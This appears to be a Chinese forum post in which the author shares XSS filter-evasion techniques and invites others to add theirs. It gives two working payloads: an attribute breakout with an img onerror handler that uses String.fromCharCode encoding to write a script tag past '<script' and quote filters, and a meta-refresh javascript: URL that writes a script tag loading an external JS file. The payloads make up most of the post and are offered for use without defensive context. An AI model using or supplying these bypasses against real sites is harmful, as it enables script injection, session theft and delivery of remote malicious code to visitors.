發一些我常用的Xss技巧,希望大家可以一起發出來探討

06-02

在網頁過濾了<script和單引號的情況下可以使用代碼

"><img src="" onerror="document.write(String.fromCharCode(60)+String.fromCharCode(115)+String.fromCharCode(99)+String.fromCharCode(114)+String.fromCharCode(105)+String.fromCharCode(112)+String.fromCharCode(116)+String.fromCharCode(62)+String.fromCharCode(97)+String.fromCharCode(108)+String.fromCharCode(101)+String.fromCharCode(114)+String.fromCharCode(116)+String.fromCharCode(40)+String.fromCharCode(49)+String.fromCharCode(41)+String.fromCharCode(60)+String.fromCharCode(47)+String.fromCharCode(115)+String.fromCharCode(99)+String.fromCharCode(114)+String.fromCharCode(105)+String.fromCharCode(112)+String.fromCharCode(116)+String.fromCharCode(62))">

繞過,上面write中內容輸出的結果是<script>alert(1)</script>

遇到過濾<script>無法調用js的時候也可以用類似的代碼突破

"><meta http-equiv="Refresh" content="0;url=javascript:document.write(String.fromCharCode(60)+String.fromCharCode(115)+String.fromCharCode(99)+String.fromCharCode(114)+String.fromCharCode(105)+String.fromCharCode(112)+String.fromCharCode(116)+String.fromCharCode(32)+String.fromCharCode(115)+String.fromCharCode(114)+String.fromCharCode(99)+String.fromCharCode(61)+String.fromCharCode(120)+String.fromCharCode(120)+String.fromCharCode(120)+String.fromCharCode(62)+String.fromCharCode(60)+String.fromCharCode(47)+String.fromCharCode(115)+String.fromCharCode(99)+String.fromCharCode(114)+String.fromCharCode(105)+String.fromCharCode(112)+String.fromCharCode(116)+String.fromCharCode(62))>

上面代碼是跳轉url到javascript:document.write("<script src=xxx></script>")

也就是調用js文件xxx
推薦閱讀：

※快速製作PPT
※平時生活中有哪些保命的技能？
※家庭養花施肥和澆水經驗技巧
※這4個溝通客戶的技巧，能讓客戶更喜歡你
※文件夾【棒針技巧2】

TAG:希望 | 技巧 | 大家 | 探討 | 一些 |